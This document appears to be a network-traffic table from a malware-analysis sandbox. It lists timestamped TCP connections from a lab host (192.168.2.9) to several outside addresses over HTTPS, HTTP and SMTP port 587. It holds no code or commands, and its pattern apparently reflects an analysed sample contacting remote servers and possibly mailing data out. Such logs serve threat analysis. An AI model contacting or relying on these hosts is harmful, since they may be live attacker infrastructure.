                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.984932899 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.984954119 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.985119104 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.985140085 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.985225916 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.991326094 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.991344929 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.991463900 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.991477966 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.991539955 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.997359037 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.997380972 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.997493982 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.997505903 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.997591972 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004353046 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004370928 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004477024 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004487991 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004545927 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150129080 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150151014 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150268078 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150278091 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150345087 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.156992912 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157025099 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157108068 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157119989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157193899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163748980 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163770914 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163844109 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163852930 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163871050 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.167243004 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170671940 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170691013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170805931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170818090 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170937061 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176693916 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176712036 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176879883 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176891088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176959038 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182096004 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182133913 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182184935 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182267904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182328939 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277949095 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277972937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277985096 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277992010 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.600315094 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.629084110 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.719619036 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.719712019 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.748485088 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.748563051 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.749125004 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.839926958 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.839940071 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.868360043 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:35.985436916 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.043401957 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.061935902 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.062047958 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.062119007 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.084744930 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.171304941 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.204078913 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.290616989 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.547095060 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.654150963 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.763911009 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.763958931 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.764065981 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.767568111 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.767587900 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.854470968 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.973881960 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974069118 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974234104 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974292040 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.093535900 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.093558073 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.983581066 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.983702898 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.990793943 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.990804911 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.991168022 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.046255112 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.095640898 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.139333963 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429776907 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429850101 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429924965 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.501676083 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.952589989 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.014857054 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.014908075 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.015017986 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.015136003 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.071923018 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.072062969 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074668884 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074693918 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.134397030 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.193989038 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.194005013 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.534398079 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.653887987 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.654055119 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.656440020 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.656440020 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.776108980 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.776130915 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.414022923 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.414154053 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.414241076 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.421924114 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.541280985 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.681947947 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.801214933 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.801481009 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.804321051 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.804337978 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.924387932 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.924408913 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.996707916 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.997000933 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.997164965 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.999142885 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.118360996 CET804971754.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.698191881 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.817720890 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.817816019 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.822365046 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.822403908 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.941864014 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.941876888 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.842129946 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.842242956 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.842338085 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.842504025 CET4971880192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.919414043 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.919516087 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.919560909 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.919832945 CET4971980192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.961779118 CET804971818.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.038727999 CET804971944.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.093432903 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.212769985 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.212873936 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.213071108 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.213103056 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.260833979 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.332309008 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.332335949 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380168915 CET8049721172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380281925 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380510092 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380527020 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.499780893 CET8049721172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.499804974 CET8049721172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.509558916 CET8049721172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.551676035 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.555583954 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.555695057 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.555735111 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.555749893 CET4972080192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.675081968 CET804972054.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.744545937 CET4972280192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.759840012 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.863823891 CET804972272.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.863898039 CET4972280192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.864082098 CET4972280192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879156113 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879236937 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879489899 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879518032 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.983325005 CET804972272.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.998740911 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.998770952 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.488719940 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.608156919 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.862093925 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.913984060 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.976599932 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.976666927 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.976926088 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.976954937 CET4972380192.168.2.944.221.84.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.096204996 CET804972344.221.84.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.251940966 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371323109 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371443987 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371730089 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371751070 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.446824074 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.491043091 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.491072893 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.554712057 CET4972280192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.566169977 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.566510916 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.575764894 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.576163054 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.695230961 CET8049721172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.695302963 CET4972180192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.695369959 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.695432901 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.727335930 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.727360010 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.846689939 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.846703053 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.499865055 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.507765055 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.554627895 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.627088070 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.627157927 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.627351046 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.746716976 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.828200102 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.830159903 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.949868917 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.949939966 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.950114965 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.043198109 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.069323063 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.390676022 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.390891075 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.510524988 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.924350023 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:48.925425053 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.044635057 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.446821928 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.460442066 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.579735041 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.992284060 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:49.992652893 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.112127066 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.512968063 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.513339043 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.632622004 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033073902 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033217907 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.152493954 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.553322077 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554243088 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554286003 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554294109 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554318905 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673742056 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673757076 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673768044 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673784971 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.307727098 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.316836119 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.330883026 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.351552010 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.367185116 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.382766962 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.719649076 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.762592077 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839005947 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839137077 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839330912 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.881875992 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.881953955 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.882267952 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.958539009 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.001640081 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979266882 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979295015 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979619026 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.126724958 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127228022 CET804972913.248.148.254192.168.2.9
